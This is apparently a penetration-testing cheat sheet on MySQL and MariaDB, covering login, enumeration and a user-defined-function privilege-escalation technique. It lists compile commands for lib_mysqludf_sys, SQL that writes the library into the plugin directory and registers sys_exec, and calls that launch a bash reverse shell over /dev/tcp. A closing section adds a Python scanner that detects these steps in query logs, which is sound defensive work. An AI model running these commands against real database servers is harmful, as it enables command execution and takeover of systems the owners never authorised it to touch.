# MySQL / MariaDB

Basic CLI syntax:

```
$ mysql -h 127.0.0.1 -P 3306 -u snovvcrash -p'Passw0rd!' -e 'show databases;'
```

Basic enumeration:

```
mysql> show GRANTS;
mysql> select @@hostname, @@tmpdir, @@version, @@version_compile_machine, @@plugin_dir;
```

## UDF PrivEsc

* <https://www.exploit-db.com/exploits/1518>
* <https://github.com/mysqludf/lib_mysqludf_sys>
* <https://gist.github.com/snovvcrash/efeb79d3e2648ec5009dd2ea7052f8b9>

Install dependencies and clone the library source:

```
$ sudo apt install libmariadbclient-dev -y
$ git clone https://github.com/mysqludf/lib_mysqludf_sys && cd lib_mysqludf_sys
```

Compile `.so` library (x86 example):

```
$ sudo apt install libc6-dev-i386 -y
$ gcc lib_mysqludf_sys.c -o lib_mysqludf_sys_x86.so -m32 -Wl,--hash-style=both -fPIC -Wall -I/usr/include/mariadb/server -I/usr/include/mariadb/server/private -I. -shared -L/usr/lib/x86_64-linux-gnu/libstdc++.so.6
```

Compile `.so` library (x64 example):

```
$ gcc lib_mysqludf_sys.c -o lib_mysqludf_sys_x64.so -m64 -Wl,--hash-style=both -fPIC -Wall -I/usr/include/mariadb/server -I/usr/include/mariadb/server/private -I. -shared -L/usr/lib/x86_64-linux-gnu/libstdc++.so.6
```

Convert library to hex:

```
$ xxd -p lib_mysqludf_sys_x64.so | tr -d '\n'
```

Load the library and call the user-defined `sys_exec` function with a reverse shell.

MySQL (x86 example):

```
mysql> use mysql;
mysql> create table pwn(line blob);
mysql> insert into pwn values(load_file('/tmp/lib_mysqludf_sys_x86.so'));
mysql> select * from pwn into dumpfile '/usr/lib/lib_mysqludf_sys_x86.so';

# Or load it from hex:
mysql> set @pwn = '7F..00';
mysql> select unhex(@pwn) into dumpfile '/usr/lib/lib_mysqludf_sys_x86.so';

mysql> create function sys_exec returns integer soname 'lib_mysqludf_sys_x86.so';
mysql> select sys_exec("/bin/bash -c '/bin/bash -i >& /dev/tcp/127.0.0.1/1337 0>&1'");
```

MariaDB (x64 example):

```
MariaDB> show variables like '%plugin%';  # get lib path
MariaDB> use mysql;
MariaDB> create table pwn(line blob);
MariaDB> insert into pwn values(load_file('/tmp/lib_mysqludf_sys_x64.so'));
MariaDB> select * from pwn into dumpfile '/usr/lib/x86_64-linux-gnu/mariadb19/plugin/lib_mysqludf_sys_x64.so';

# Or load it from hex:
MariaDB> set @pwn = 0x7F..00;
MariaDB> select binary @pwn into dumpfile '/usr/lib/x86_64-linux-gnu/mariadb19/plugin/lib_mysqludf_sys_x64.so';

MariaDB> create function sys_exec returns integer soname 'lib_mysqludf_sys_x64.so';
MariaDB> select sys_exec("/bin/bash -c '/bin/bash -i >& /dev/tcp/127.0.0.1/1337 0>&1'");
```
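
Detection side of the sequence above, as an added example (not part of the original notes or of any project linked here): a scanner that flags the three observable steps in recorded SQL statements, namely a shared library written via `into dumpfile`/`into outfile`, a `create function ... soname` registration, and later calls to the registered function. It assumes statements have already been extracted from a general query log or audit log; `scan`, `SAMPLE_LOG` and the rule names are hypothetical.

```python
import re
from pathlib import PurePosixPath

# Constructed sample statements, in the order a query log would record them.
SAMPLE_LOG = [
    "select @@hostname, @@version, @@plugin_dir",
    "select * from pwn into dumpfile '/usr/lib/lib_mysqludf_sys_x86.so'",
    "select name from report into outfile '/tmp/report.csv'",
    "create function sys_exec returns integer soname 'lib_mysqludf_sys_x86.so'",
    "select sys_exec('id')",
]

# File written by the server through SQL.
WRITE_RE = re.compile(r"\binto\s+(?:dumpfile|outfile)\s+['\"]([^'\"]+)['\"]", re.I)
# UDF registration (MySQL and MariaDB syntax variants).
UDF_RE = re.compile(
    r"\bcreate\s+(?:or\s+replace\s+)?(?:aggregate\s+)?function\s+"
    r"(?:if\s+not\s+exists\s+)?`?(\w+)`?\s+returns\s+\w+\s+soname\s+['\"]([^'\"]+)['\"]",
    re.I,
)


def scan(statements):
    """Return (index, rule, detail) findings for UDF-abuse indicators."""
    findings, dropped_libs, udfs = [], set(), set()
    for i, stmt in enumerate(statements):
        m = WRITE_RE.search(stmt)
        if m and m.group(1).lower().endswith(".so"):
            # The database server itself wrote a shared library to disk.
            dropped_libs.add(PurePosixPath(m.group(1)).name)
            findings.append((i, "library-written-by-sql", m.group(1)))
        m = UDF_RE.search(stmt)
        if m:
            name, lib = m.group(1).lower(), m.group(2)
            udfs.add(name)
            # Highest signal: the UDF is backed by a library dropped earlier via SQL.
            rule = "udf-from-dropped-library" if lib in dropped_libs else "udf-created"
            findings.append((i, rule, f"{name} -> {lib}"))
            continue
        for name in udfs:
            # Any later call to a function registered during this log window.
            if re.search(rf"\b{re.escape(name)}\s*\(", stmt, re.I):
                findings.append((i, "udf-invoked", name))
    return findings


if __name__ == "__main__":
    for idx, rule, detail in scan(SAMPLE_LOG):
        print(f"stmt {idx}: {rule}: {detail}")
```

The ordinary export to `/tmp/report.csv` is not flagged; only writes ending in `.so` and `soname` registrations raise findings.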
